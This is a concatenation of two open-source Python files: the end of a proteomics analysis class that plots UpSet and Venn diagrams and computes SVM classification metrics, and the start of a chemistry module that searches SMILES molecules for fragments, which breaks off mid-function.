exclude_sets = [s for flag, s in flags_zip_sets if not bits & flag]
combo = set.intersection(*include_sets)
combo = set.difference(combo, *exclude_sets)
tag = "".join([str(int((bits & flag) > 0)) for flag in bit_flags])
experiment_decoded = []
for digit, exp in zip(list(tag), multi_choice):
if digit=="0":
continue
else:
experiment_decoded.append(exp)
#dictio[len(combo)] = experiment_decoded
if len(multi_choice)>3:
if len(combo)>300:
overlapping_ids.append(len(combo))
experiments.append(experiment_decoded)
else:
if len(combo)>0:
overlapping_ids.append(len(combo))
experiments.append(experiment_decoded)
#combo_sets.append((tag, len(combo)))
fig_UpSetPlot = plt.Figure()
series_UpSetPlot = from_memberships(experiments, data=overlapping_ids)
upplot(series_UpSetPlot, fig=fig_UpSetPlot, show_counts="%d")
return fig_UpSetPlot
if "Sequence" not in self.df_01_filtered_combined.index.names:
sets_proteins_total = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").index.get_level_values("Protein IDs"))
for i in multi_choice_venn]
sets_proteins_intersection = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").unstack(["Map", "Exp_Map"]).dropna()\
.index.get_level_values("Protein IDs")) for i in multi_choice_venn]
else:
sets_proteins_total = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").index.get_level_values("Sequence"))
for i in multi_choice_venn]
sets_proteins_intersection = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").unstack(["Map", "Exp_Map"]).dropna()\
.index.get_level_values("Sequence")) for i in multi_choice_venn]
figure_UpSetPlot_total = create_upsetplot(sets_proteins_total, multi_choice_venn)
figure_UpSetPlot_int = create_upsetplot(sets_proteins_intersection, multi_choice_venn)
#make matplot figure available for plotly
def convert_venn_jpg(vd):
vd = vd.figure
out_img = BytesIO()
plt.savefig(out_img, bbox_inches="tight",format="jpg", dpi=72)
out_img.seek(0) # rewind file
im = Image.open(out_img)
plt.clf()
return im
if len(multi_choice_venn) == 2:
vd_t = venn2(sets_proteins_total, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:2], alpha=0.8)
vd_t = plt.title("in at least one map")
im_t = convert_venn_jpg(vd_t)
vd_i = venn2(sets_proteins_intersection, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:2], alpha=0.8)
vd_i = plt.title("in all maps")
im_i = convert_venn_jpg(vd_i)
elif len(multi_choice_venn) == 3:
vd_t = venn3(sets_proteins_total, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:3], alpha=0.8)
vd_t = plt.title("in at least one map")
im_t = convert_venn_jpg(vd_t)
vd_i = venn3(sets_proteins_intersection, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:3], alpha=0.8)
vd_i = plt.title("in all maps")
im_i = convert_venn_jpg(vd_i)
else:
im = "Venn diagram can be displayed for 3 Experiments or less"
return im,im, figure_UpSetPlot_total, figure_UpSetPlot_int
return im_t, im_i, figure_UpSetPlot_total, figure_UpSetPlot_int
def dynamic_range_comparison(self, collapse_cluster=False, multi_choice=["Exp1", "Exp2"], ref_exp="Exp1"):
"""
A box plot for desired experiments (multi_choice) and all protein clusters is generated displaying the dynamic range
Args:
self:
multi_choice: list of experiment names
df_dynamicRange_combined: df, no index, column names: "Max", "Min", "Dynamic Range", "Cluster", "Experiment"
Returns:
fig_dynamic_range: bar plot, dynamic range of each protein cluster for desired experiments is displayed.
"""
df_dynamicRange_combined = self.df_dynamicRange_combined.copy()
df_dynamicRange_combined = df_dynamicRange_combined[df_dynamicRange_combined["Experiment"].isin(multi_choice)]
df_dynamicRange_combined = df_dynamicRange_combined.assign(Experiment_lexicographic_sort = pd.Categorical(df_dynamicRange_combined["Experiment"],
categories=multi_choice, ordered=True))
df_dynamicRange_combined.sort_values(["Experiment_lexicographic_sort", "Dynamic Range"], inplace=True)
fig_dynamic_range = px.bar(df_dynamicRange_combined,
x="Cluster",
y="Dynamic Range",
base="Min",
facet_row="Experiment",
template="simple_white",
height=400*len(multi_choice),
width=1200)
df_dynamicRange_combined_ref = df_dynamicRange_combined.drop(["Experiment_lexicographic_sort"], axis=1)
df_dynamicRange_combined_ref = df_dynamicRange_combined.set_index(["Cluster", "Experiment"], drop=False).unstack("Cluster")["Dynamic Range"]
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.div(df_dynamicRange_combined_ref.xs(ref_exp))
df_RelDynamicRange = pd.concat([df_dynamicRange_combined_ref.median(axis=1), df_dynamicRange_combined_ref.sem(axis=1)], axis=1,
keys=["Dynamic Range (rel, median)", "SEM"]).reset_index()
if collapse_cluster == False:
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.stack("Cluster")
df_dynamicRange_combined_ref.name="Normalized Dynamic Range"
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.reset_index()
fig_RelDynamicRange = px.bar(df_dynamicRange_combined_ref,
x="Cluster",
y="Normalized Dynamic Range",
title="Dynamic Range - normalization to reference experiment: {}".format(ref_exp),
barmode="group",
template="simple_white",
color="Experiment")
fig_RelDynamicRange.update_xaxes(categoryorder="total ascending")
fig_RelDynamicRange.update_layout(autosize=False,
width=1200 if len(multi_choice)<=3 else 300*len(multi_choice),
height=500,
template="simple_white"
)
else:
fig_RelDynamicRange = px.bar(df_RelDynamicRange.sort_values("Dynamic Range (rel, median)"),
x="Experiment",
y="Dynamic Range (rel, median)",
error_x="SEM", error_y="SEM",
template="simple_white",
title="Dynamic Range - median of all individual normalized medians - reference experiment: {}".format(ref_exp),
color="Experiment")
fig_RelDynamicRange.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
template="simple_white"
)
return pn.Column(pn.Row(fig_dynamic_range), pn.Row(fig_RelDynamicRange))
def calculate_global_scatter(self, multi_choice, metric, consolidation):
"""
A distribution plot of the profile scatter in each experiment is generated, with variable distance metric and consolidation of replicates.
Args:
self:
df_01_filtered_combined: df, indexed
multi_choice: list of experiment names
metric: distance metric, one of 'euclidean distance', 'manhattan distance', '1 - cosine correlation', '1 - pearson correlation'
consolidation: method to consolidate replicate distances, one of 'median', 'average', 'sum'
Returns:
plot: plotly.figure_factory.displot, shows kernel density estiamtion in the main pane and a rug plot underneath. Traces are sorted by ascending median of the distribution.
"""
# Option dictionaries
cons_functions = {
"median": np.median,
"average": np.mean,
"sum": np.sum
}
metrics = {
"euclidean distance": "euclidean",
"manhattan distance": "manhattan",
"1 - cosine correlation": "cosine",
"1 - pearson correlation": lambda x,y: 1-np.corrcoef(x,y)[0][1],
"manhattan distance to average profile": [np.mean, pw.paired_manhattan_distances],
"manhattan distance to median profile": [np.median, pw.paired_manhattan_distances]
}
# Option assertion
assert consolidation in cons_functions.keys()
assert metric in metrics.keys()
# Filter experiments and intersection of proteins
df = self.df_01_filtered_combined.loc[
self.df_01_filtered_combined.index.get_level_values("Experiment").isin(multi_choice)].copy()
df.index = df.index.droplevel(["Exp_Map", "Gene names", "Compartment"])
if "Sequence" in df.index.names:
df.index = df.index.droplevel(["Protein IDs"])
df_across = df.unstack(["Experiment", "Map"]).dropna().stack(["Experiment", "Map"])
nPG = df_across.unstack(["Experiment", "Map"]).shape[0]
# Calculate and consolidate distances
distances = pd.DataFrame()
for exp in multi_choice:
df_m = df_across.xs(exp, level="Experiment", axis=0)
maps = list(set(df_m.index.get_level_values("Map")))
# this if clause switches between pairwise comparisons of profiles (else) and comparisons to an average/median profile
if " to " in metric:
df_m = df_m.unstack("Map")
# calculate reference profiles
df_profiles = df_m.stack("Fraction").apply(metrics[metric][0], axis=1).unstack("Fraction")
# calculate the distance for every map
distances_m = pd.DataFrame()
for m in maps:
dist_m = pd.DataFrame(metrics[metric][1](df_m.xs(m, level="Map", axis=1), df_profiles), columns = [m])
distances_m = pd.concat([distances_m, dist_m], axis=1)
distances_m.index = df_m.index
else:
distances_m = pd.DataFrame()
# loop over pairs of maps
for i,mapi in enumerate(maps):
for j,mapj in enumerate(maps):
# only look at each comparison once
if j <= i:
continue
dist = pw.paired_distances(df_m.xs(mapi, level="Map", axis=0).values,
df_m.xs(mapj, level="Map", axis=0).values,
metric = metrics[metric])
dist = pd.Series(dist, name="_".join([mapi,mapj]))
distances_m = pd.concat([distances_m, dist], axis=1)
distances_m.index = df_m.xs(maps[0], level="Map", axis=0).index
distances = pd.concat([distances, pd.Series(distances_m.apply(cons_functions[consolidation], axis=1), name=exp)], axis=1)
distances.index = distances_m.index
self.distances = distances
# Create and return plot
plot = ff.create_distplot(distances.T.values, distances.columns, show_hist=False)
plot.update_layout(title="Distribution of {} {}s, n = {}".format(metric, consolidation, nPG),
width=1500, height=600, template="simple_white", xaxis={"rangemode": "nonnegative"})
return plot
def svm_processing(self):
"""
The misclassification matrix, generated by Perseus, will be used for Recall/Precision calculation of each individual cluster and on a global level.
Data will be stored in a local dictionary that will be assigned to the global dictionary.
Args:
self.df_SVM: dataframe, provided by Perseus, no index;
Column names: e.g. "Predicted: ER", "Predicted: NPC"
Rows: e.g. "True: ER", "True: NPC"
Returns:
self.analysed_datasets_dict:
local dictionary (SVM_dict) will be assigned to the global dictionary self.analysed_datasets_dict, that is available for downloading
{"Experiment name" : {see def read_jsonFile(self) [below]}
{"Misclassification Analysis":
{
"True: ER" : {
"Recall": int,
"FDR": int,
"Precision": int,
"F1": int
}
"True: NPC" : {...}
...
"Summary": {...}
}
}
}
"""
global_SVM_dict_total = {}
global_SVM_dict = {}
for exp in self.json_dict.keys():
try:
df_SVM = pd.read_json(self.json_dict[exp]["Misclassification Matrix"])
df_SVM["T: True group"] = df_SVM["T: True group"].str.replace(r'True: ', '')
except KeyError:
continue
SVM_dict = {}
all_correct = np.diag(df_SVM)
members = df_SVM.sum(axis=1)
total_members = 0
membrame_members = 0
membrane_correct = 0
all_organelle_recall = []
all_organelle_precision = []
all_organelle_f1 = []
F1_all_cluster = []
no_of_membrane_clusters = 0
total_correct = sum(all_correct)
predicted_one_organelle = df_SVM.sum(axis=0)
for i in range(len(df_SVM)):
total_members = total_members + members[i]
recall = all_correct[i]/members[i]
fdr = (predicted_one_organelle[i]-all_correct[i])/predicted_one_organelle[i]
precision = 1-fdr
F1 = statistics.harmonic_mean([recall, precision])
F1_all_cluster.append(F1)
SVM_dict[df_SVM["T: True group"][i]] = {"Recall": recall, "FDR": fdr, "Precision": precision, "F1": F1}
if df_SVM["T: True group"][i]!="Nuclear pore complex" and df_SVM["T: True group"][i]!="Large Protein Complex" and df_SVM["T: True group"][i]!="Actin binding proteins" :
no_of_membrane_clusters = no_of_membrane_clusters+1
membrame_members = membrame_members + members[i]
membrane_correct = membrane_correct + all_correct[i]
all_organelle_f1.append(F1)
all_organelle_recall.append(recall)
all_organelle_precision.append(precision)
total_recall = total_correct/total_members
membrane_recall = membrane_correct/membrame_members
av_per_organelle_recall = statistics.mean(all_organelle_recall)
median_per_organelle_recall = statistics.median(all_organelle_recall)
av_per_organelle_precision = statistics.mean(all_organelle_precision)
avg_organelle_f1 = statistics.mean(all_organelle_f1)
avg_F1_all_cluster = statistics.mean(F1_all_cluster)
SVM_dict_total = {}
SVM_dict_total["Avg. all clusters"] = {"Recall": total_recall, "F1": avg_F1_all_cluster} #total recall = marker prediction accuracy
SVM_dict_total["Avg. all organelles"] = {"Recall": av_per_organelle_recall, "F1": avg_organelle_f1, "Precision": av_per_organelle_precision}
SVM_dict_total["Membrane"] = {"Recall": membrane_recall}
SVM_dict_total["Median. per organelle"] = {"Recall": median_per_organelle_recall}
global_SVM_dict[exp] = SVM_dict
global_SVM_dict_total[exp] = SVM_dict_total
self.global_SVM_dict = global_SVM_dict
self.global_SVM_dict_total = global_SVM_dict_total
if global_SVM_dict=={}:
self.cache_stored_SVM = False
return
else:
df_clusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict[i][j]
for i in global_SVM_dict.keys()
for j in global_SVM_dict[i].keys()},
orient='index')
df_clusterPerformance_global.index.names = ["Experiment", "Type"]
self.df_clusterPerformance_global = df_clusterPerformance_global.T
df_AvgClusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict_total[i][j]
for i in global_SVM_dict_total.keys()
for j in global_SVM_dict_total[i].keys()},
orient='index')
df_AvgClusterPerformance_global.index.names = ["Experiment", "Type"]
self.df_AvgClusterPerformance_global = df_AvgClusterPerformance_global.T
self.cache_stored_SVM = True
return
def svm_plotting(self, multi_choice):
"""
The markerperformance (line/scatter plot) as well as marker prediction accuracy (bar plot) is visuaized.
Args:
self: df_AvgClusterPerformance_global
df_clusterPerformance_global
multi_choice: list of experiment names
"""
df_clusterPerformance_global = self.df_clusterPerformance_global
df_AvgClusterPerformance_global = self.df_AvgClusterPerformance_global
df_AvgAllCluster = df_AvgClusterPerformance_global.xs("Avg. all clusters", level='Type', axis=1)
fig_markerPredictionAccuracy = go.Figure()#data=[go.Bar(x=df_test.columns, y=df_test.loc["Recall"])])
for exp in multi_choice:
fig_markerPredictionAccuracy.add_trace(go.Bar(x=[exp], y=[df_AvgAllCluster[exp].loc["Recall"]], name=exp))
fig_markerPredictionAccuracy.update_layout(template="simple_white", #showlegend=False,
title="Marker prediction accuracy - Overall recall",
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="Marker prediction accuracy [%]",
mirror=True),
)
fig_clusterPerformance = go.Figure()
list_data_type = ["Avg. all clusters", "Avg. all organelles"]
for i,exp in enumerate(multi_choice):
df_clusterPerformance = df_clusterPerformance_global.xs(exp, level='Experiment', axis=1)
df_AvgClusterPerformance = df_AvgClusterPerformance_global.xs(exp, level='Experiment', axis=1)
fig_clusterPerformance.add_trace(go.Scatter(x=df_clusterPerformance.columns, y=df_clusterPerformance.loc["F1"],
marker=dict(color=pio.templates["simple_white"].layout["colorway"][i]), name=exp))
for data_type in list_data_type:
fig_clusterPerformance.add_trace(go.Scatter(x=[data_type], y=[df_AvgClusterPerformance[data_type].loc["F1"]],
mode="markers",
showlegend=False,
marker=dict(color=pio.templates["simple_white"].layout["colorway"][i])
))
fig_clusterPerformance.update_layout(template="simple_white", #showlegend=False,
title="Cluster wise SVM analysis",
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="F1 score", #- harmonic mean of recall and precision
mirror=True),
)
return fig_markerPredictionAccuracy, fig_clusterPerformance
def __repr__(self):
return str(self.__dict__)
#return "This is a spatial dataset with {} lines.".format(len(self.df_original))
def svm_heatmap(df_SVM):
"""
The misclassification matrix, generated by Perseus, will be displayed as a heatmap.
Args:
self.df_SVM: dataframe, provided by Perseus, no index;
Column names: e.g. "Predicted: ER", "Predicted: NPC"
Rows: e.g. "True: ER", "True: NPC"
Returns:
fig_SVMheatmap: heatmap of the misclassification matrix
"""
#df_SVM = self.df_SVM.copy()
#if hasattr(df_SVM, "keys") == True:
try:
df_SVM = pd.read_json(df_SVM["Misclassification Matrix"])
df_SVM = df_SVM.set_index("T: True group")[::-1]
except:
df_SVM = df_SVM.set_index("T: True group")[::-1]
y_axis_label = df_SVM.index
x_axis_label = df_SVM.columns
data_svm = df_SVM.values
fig_SVMheatmap = go.Figure()
fig_SVMheatmap.add_trace(go.Heatmap(
z=data_svm,
x = x_axis_label,
y = y_axis_label,
colorscale=[
[0.0, "green"],
[0.01, "white"],
[1.0, "red"]
],
))
return fig_SVMheatmap
def reframe_df_01_fromJson_for_Perseus(json_dict):
"""
Make 0-1 normalized data from all experiments available for Perseus
Args:
json: dictionary, json file uploaded in manage dataset tab.
Return:
df: 0-1 normlaized data (globally normalized), with Gene names, Protein IDs, Comaprtment as columns
Pattern for Column data: Exp_Map_Fraction
"""
for exp_name in json_dict.keys():
for data_type in json_dict[exp_name].keys():
if data_type == "0/1 normalized data" and exp_name == list(json_dict.keys())[0]:
df_01_combined = pd.read_json(json_dict[exp_name][data_type])
df_01_combined = df_01_combined.set_index(["Gene names", "Protein IDs", "Compartment"]).copy()
df_01_combined.drop([col for col in df_01_combined.columns if not col.startswith("normalized profile")])
df_01_combined.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_combined.columns], names=["Set", "Map", "Fraction"])
df_01_combined.rename(columns = {"normalized profile":exp_name}, inplace=True)
elif data_type == "0/1 normalized data" and exp_name != list(json_dict.keys())[0]:
df_01_toadd = pd.read_json(json_dict[exp_name][data_type])
df_01_toadd = df_01_toadd.set_index(["Gene names", "Protein IDs", "Compartment"]).copy()
df_01_toadd.drop([col for col in df_01_toadd.columns if not col.startswith("normalized profile")])
df_01_toadd.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_toadd.columns], names=["Set", "Map", "Fraction"])
df_01_toadd.rename(columns = {"normalized profile":exp_name}, inplace=True)
df_01_combined = pd.concat([df_01_combined, df_01_toadd], axis=1)
df_01_combined.columns.names = ["Experiment", "Map", "Fraction"]
df = df_01_combined.stack(["Experiment", "Map"]).dropna(axis=0)
df = df.div(df.sum(axis=1), axis=0)
index_ExpMap = df.index.get_level_values("Experiment")+"_"+df.index.get_level_values("Map")
index_ExpMap.name = "Exp_Map"
df.set_index(index_ExpMap, append=True, inplace=True)
df.index = df.index.droplevel(["Map", "Experiment"])
df = df.stack("Fraction").unstack(["Exp_Map", "Fraction"])
df.columns = ["_".join(col) for col in df.columns.values]
return df
|
the-stack_0_12347 |
from src.smiles_to_structure import convert_to_structure, MoleculeStructure, Fragment
from collections import Counter
from termcolor import cprint
from src.fragments_library import special_cases, biomolecules, peptide_amino_acids, heterocycles, \
common_aromatic_heterocycles, generalized_heterocycles, arenes, functional_groups, hydrocarbons, aromatic_fragments
'''The find_fragment method allows a substructure search of a given chemical fragment within a molecule
(subgraph isomorphism). Takes
The fragmentize method allows a library of fragments to be searched for within a molecule via the find_fragment method.
Takes the SMILES string of a molecule and fragment libraries as *args as inputs.
The fragment library should be ordered hierarchically, with more complex fragments being searched first. Atoms found in
any given substructure search are marked as discovered and are not used in further substructure searches (unless
specified as "phantom atoms", see fragments_library).
The method will return a list of names of the fragments found and the labeled molecular structure as a tuple
-> (fragment_names_list, labeled_structure)
If numeric=True, will return a vector with the count of the number of each fragment found and the labeled molecular
structure as a tuple
-> (fragment_vector, labeled_structure)
'''
class AtomData:
def __init__(self, symbol):
self.symbol = symbol
self.bond = None
self.daughter_branches = []
self.ring_closures = set()
self.phantom_bonds = None
self.phantom_atom = False
class Branch:
def __init__(self, bond):
self.bond = bond
self.sequence = []
def abbr_bond(bond):
return bond.bond_code, bond.atom.symbol
# bond_atom_info is the atom_info of the atom for the bond being checked (to see if it's a phantom bond/discovered)
def check_bond(bond, map_bond, bond_atom_info):
# if the bond.atom is discovered already, it should give back false (can't retread over discovered atoms)
# unless the atom_info for that atom shows that the bond.atom should be a phantom atom (which can be searched for in discovered atoms)
if bond.atom.discovered:
if not bond_atom_info.phantom_atom:
return False
if abbr_bond(bond) == map_bond:
return True
# need to cover (correct, R) (correct, Q) (9, R) (9, Q) (9, correct)
elif bond.bond_code == map_bond[0] or map_bond[0] == 9: # covers (correct, R) (correct, Q) (9, R) (9, Q)
if map_bond[1] == "R":
return True
elif map_bond[1] == "Q" and bond.atom.heteroatom:
return True
elif bond.atom.symbol == map_bond[1]:
if map_bond[0] == 9:
return True
else:
return False
def calc_branch_length(branch):
branch_length = 0
def add_daughter_branch_length(daughter_branch):
nonlocal branch_length
branch_length += len(daughter_branch.sequence)
if len(daughter_branch.sequence[-1].daughter_branches) > 0:
for b in daughter_branch.sequence[-1].daughter_branches:
add_daughter_branch_length(b)
add_daughter_branch_length(branch)
return branch_length
def find_fragment(fragment_string, molecule_string, fragment_name, structure=None, verbose=False):
verbose_bin = []
if structure:
molecule_structure = structure
else:
molecule_structure = convert_to_structure(MoleculeStructure(), molecule_string)
fragment_structure = convert_to_structure(MoleculeStructure(), fragment_string)
def find_anchor_atom(fragment):
for ele in ["Si", "P", "p", "S", "s", "I", "Br", "Cl", "F", "B", "b", "O", "o", "N", "n", "C", "c", "R"]:
for atom in fragment.atom_list:
if atom.symbol == ele:
return atom
fragment_anchor_atom = find_anchor_atom(fragment_structure)
# the actual atom object of highest priority in the fragment structure
def is_potential_anchor(atom, fragment_anchor_atom, atom_list):
# searches through all atoms in molecules in total_molecule to see if they match the fragment base atom
# atom -> current atom its checking
# atom_list is list where potential anchor atoms are stored
# fragment_anchor_atom is the actual atom object from the fragment structure
if atom.discovered and not fragment_anchor_atom.phantom_atom: # if fragment_anchor atom is a phantom atom, it can use discovered atoms as potential anchors
return
# atom has already been used to find a fragment
if atom.symbol != fragment_anchor_atom.symbol and fragment_anchor_atom.symbol != 'R': # TODO what about if anchor atom is Q!??
return
# check to see if atom is the same element
fragment_anchor_atom_bonds = Counter([abbr_bond(bond) for bond in fragment_anchor_atom.bonded_to])
# count bonds from anchor atom
atom_bonds = Counter([abbr_bond(bond) for bond in atom.bonded_to])
# count bonds in potential anchor atom where the bond's atom haven't been discovered yet (as we won't be able to use those bonds)
for key in fragment_anchor_atom_bonds:
if key[1] != "R" and key[1] != "Q" and key[0] != 9: # TODO better way to do this???
if key not in atom_bonds or fragment_anchor_atom_bonds[key] > atom_bonds[key]:
# check 1: are there bonds types in fragment base atom that current atom doesn't have
# check 2: does current atom have >= the amount of each bond type compared to fragment base atom
# i.e. are the bonds in fragment anchor atom a subset of the bonds of current atom
return
atom_list.append(atom)
# if all checks passed, atom is a potential base atom and is stored in a list
potential_anchor_atoms = []
# keeping track of atoms that match fragment base atom
for atom in molecule_structure.atom_list:
is_potential_anchor(atom, fragment_anchor_atom, potential_anchor_atoms)
if potential_anchor_atoms == []:
verbose_bin.append("no anchor atoms found")
return 0
else:
verbose_bin.append("potential anchor atoms: ")
for atom in potential_anchor_atoms:
verbose_bin.append(atom.symbol)
for bond in atom.bonded_to:
verbose_bin.append(abbr_bond(bond))
def map_fragment(fragment, anchor_atom):
visited = {}
for atom in fragment.atom_list:
visited[atom] = False
# keeps track of which atoms have been visited
atom_info_dict = {}
# links the molecule_atom and the atom_info representing that atom, used to pass ring_closure info to map
ring_closure_counter = 1
def traverse(current_atom, previous_atom, current_branch):
visited[current_atom] = True
current_atom_data = AtomData(current_atom.symbol)
# data object for current atom
# atom_data will reflect that the atom is a phantom_atom
if current_atom.phantom_atom:
current_atom_data.phantom_atom = True
atom_info_dict[current_atom] = current_atom_data
if current_branch:
current_branch.sequence.append(current_atom_data)
# append atom info to branch sequence
# if current_branch b/c first atom does not have a branch
current_atom_data.phantom_bonds = current_atom.phantom_bonds
unchecked_bonds = [bond for bond in current_atom.bonded_to if bond.atom != previous_atom]
nonlocal ring_closure_counter
# if more than 1 unchecked bonds (i.e. a branch point), create new branch for each unchecked bond
if len(unchecked_bonds) > 1:
for bond in unchecked_bonds:
if not visited[bond.atom]:
verbose_bin.append("new branch")
new_branch(bond.atom, current_atom, current_atom_data, bond.bond_code)
elif not bool(current_atom_data.ring_closures & atom_info_dict[bond.atom].ring_closures):
# if visited[bond.atom], we are at a ring closure
# this bool sees if the atom_info of these two atoms (current atom and the atom its bonded to) share any values (& operator)
# if they do, this ring closure has already been documented and we don't want to double count it
verbose_bin.append("ring closure")
current_atom_data.ring_closures.add((ring_closure_counter, bond.bond_code))
atom_info_dict[bond.atom].ring_closures.add((ring_closure_counter, bond.bond_code))
# add matching values to each atom_info.ring_closure
# ring closure data in format (ring closure #, bond_code)
ring_closure_counter += 1
# if a contiguous section of branch, add bond info
elif len(unchecked_bonds) == 1:
if current_branch:
if not visited[unchecked_bonds[0].atom]:
verbose_bin.append("continue branch")
current_atom_data.bond = abbr_bond(unchecked_bonds[0])
traverse(unchecked_bonds[0].atom, current_atom, current_branch)
elif not bool(current_atom_data.ring_closures & atom_info_dict[unchecked_bonds[0].atom].ring_closures):
verbose_bin.append("ring closure")
current_atom_data.ring_closures.add((ring_closure_counter, unchecked_bonds[0].bond_code))
atom_info_dict[unchecked_bonds[0].atom].ring_closures.add((ring_closure_counter, unchecked_bonds[0].bond_code))
ring_closure_counter += 1
# same as above
else:
verbose_bin.append("new branch")
for bond in unchecked_bonds:
new_branch(bond.atom, current_atom, current_atom_data, bond.bond_code)
# if the anchor atom only has 1 bond, need to start a branch
else:
verbose_bin.append("end point")
if not current_branch:
return current_atom_data
# this returns anchor atom to the map_fragment function as the anchor atom is not spawned from a branch @
def new_branch(current_atom, previous_atom, previous_atom_data, bond_code):
current_branch = Branch((bond_code, current_atom.symbol))
# create new branch with bonding info to first atom in branch
previous_atom_data.daughter_branches.append(current_branch)
# add new branch to the atom which spawned it
traverse(current_atom, previous_atom, current_branch)
# start traverse on first atom in branch
# need to pass previous_atom in order to not travel backwards
return traverse(anchor_atom, None, None)
# starts process of mapping fragment, but also returns the anchor atom
anchored_fragment_map = map_fragment(fragment_structure, fragment_anchor_atom)
# the map base is the atom_data representation of the anchor atom
# the rest of the map is stored in the daughter branches
def expand_map(anchor_atom):
verbose_bin.append("anchor atom")
verbose_bin.append(anchor_atom.symbol)
if len(anchor_atom.ring_closures) > 0:
verbose_bin.append("ring closures:")
for num in anchor_atom.ring_closures:
verbose_bin.append(num)
if anchor_atom.phantom_bonds:
verbose_bin.append(f"phantom bonds = {anchor_atom.phantom_bonds}")
def expand_branch_point(atom_map):
for branch in atom_map.daughter_branches:
verbose_bin.append("branch:")
verbose_bin.append(f"branch length: {len(branch.sequence)}")
verbose_bin.append(f"total branch length: {calc_branch_length(branch)}")
verbose_bin.append(f"bond to branch: {branch.bond}")
for atom_info in branch.sequence:
verbose_bin.append(atom_info.symbol)
if len(atom_info.ring_closures) > 0:
verbose_bin.append("ring closures:")
for num in atom_info.ring_closures:
verbose_bin.append(num)
if atom_info.phantom_bonds:
verbose_bin.append(f"phantom bonds = {atom_info.phantom_bonds}")
if atom_info.bond:
verbose_bin.append(atom_info.bond)
if len(atom_info.daughter_branches) > 0:
verbose_bin.append("branch point")
expand_branch_point(atom_info)
expand_branch_point(anchor_atom)
verbose_bin.append("\nexpanded map:\n")
expand_map(anchored_fragment_map)
def check_anchor_atom(potential_anchor_atom, fragment_map):
molecule_atoms = {potential_anchor_atom}
# list to keep track of which atoms in the molecule constitute a matched fragment
currently_visited = {potential_anchor_atom: fragment_map}
# dictionary that keeps track of which atoms have been used to find the fragment at any given step
def check_branch_point(current_molecule_atom, previous_molecule_atom, map_atom_info, branch_atoms):
if map_atom_info.phantom_bonds:
bond_num = len(current_molecule_atom.bonded_to)
if bond_num != map_atom_info.phantom_bonds:
verbose_bin.append("wrong amount of phantom bonds")
return False
# phantom_bonds is a way to ensure the current atom is bonded to the specified number of atoms
# note that phantom bonds includes any bonds for the current molecule_atom, including those to atoms that are "discovered"
branch_point_atoms = set()
nonlocal currently_visited
verbose_bin.append("I'm trying a branch point")
map_atom_info.daughter_branches.sort(key=calc_branch_length, reverse=True)
# this makes longer branches go first -> have to search the longest branch first
# otherwise a shorter branch might be identified in what is actually the long branch
# i.e. if atom has ethyl and propyl group, you could find the ethyl group where the propyl group is and then be unable to find propyl group
# also important - need to caculate the total branch length (including length of all its daughter branches)
verbose_bin.append("branch point bonds check")
unchecked_bonds = Counter([abbr_bond(bond) for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom])
fragment_branch_point_bonds = Counter([branch.bond for branch in map_atom_info.daughter_branches])
verbose_bin.append(unchecked_bonds)
verbose_bin.append(fragment_branch_point_bonds)
# subset check on branch point, just to make sure current atom has all the bonds the fragment branchpoint has
for key in fragment_branch_point_bonds:
if key[1] != "R" and key[1] != "Q" and key[0] != 9: # TODO better way to do this?
if key not in unchecked_bonds or fragment_branch_point_bonds[key] > unchecked_bonds[key]:
verbose_bin.append("branch point doesn't contain necessary bonds")
return False
branch_check = {}
for branch in map_atom_info.daughter_branches:
branch_check[branch] = False
# set all branches to unconfirmed
trial_paths = [bond for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom]
# available routes to see if branch matches
checked_paths = []
# keeps track of bonds that have been used to successfully identify branches
for branch in map_atom_info.daughter_branches:
# take each branch
for bond in trial_paths:
if check_bond(bond, branch.bond, branch.sequence[0]) and bond not in checked_paths and bond.atom not in currently_visited:
# if the bond to the branch matches the current bond (and the current bond hasn't already been used to identify a branch):
if try_branch(branch.sequence, bond.atom, current_molecule_atom, branch_point_atoms):
# test to see if the current branch works on this bond path
verbose_bin.append("branch successful")
branch_check[branch] = True
checked_paths.append(bond)
# if true, the branch was successfully found, turn branch to True in branch check
# add bond used to checked_paths so it isn't used for further branches
break
# need to stop the for loop so it doesn't search the matched branch in further trial_paths
else:
verbose_bin.append("branch not successful")
if all(value is True for value in branch_check.values()):
verbose_bin.append("branch point match")
if branch_atoms:
branch_atoms.update(branch_point_atoms)
else:
molecule_atoms.update(branch_point_atoms)
# first branch point does not have a branch that spawned it
return True
# if all branches have been found, they will be True in branch_check, branch point is a match, return True
else:
verbose_bin.append("branch point not matched")
return False
# one or more branches were found, branch point wasn't a match, return False
def try_branch(branch_sequence, current_molecule_atom, previous_molecule_atom, branch_point_atoms):
branch_atoms = set()
verbose_bin.append("I'm trying a branch!")
if check_atom_bonds(current_molecule_atom, previous_molecule_atom, branch_sequence, 0, branch_atoms):
branch_point_atoms.update(branch_atoms)
# add branch_atoms to branch point_atoms
return True
else:
nonlocal currently_visited
for a in branch_atoms:
currently_visited.pop(a)
def check_ring_closure(current_atom, atom_info): # already check if atom_info has ring closure
ring_closures = set() # all the ring closure numbers in currently_visited
for value in currently_visited.values():
ring_closures.update(value.ring_closures)
for closure_info in atom_info.ring_closures: # checking each ring closure atom has
verbose_bin.append("ring closure")
verbose_bin.append(closure_info)
if closure_info in ring_closures: # we've already hit the other half of the ring closure
for key in currently_visited: # looking for matching ring closure
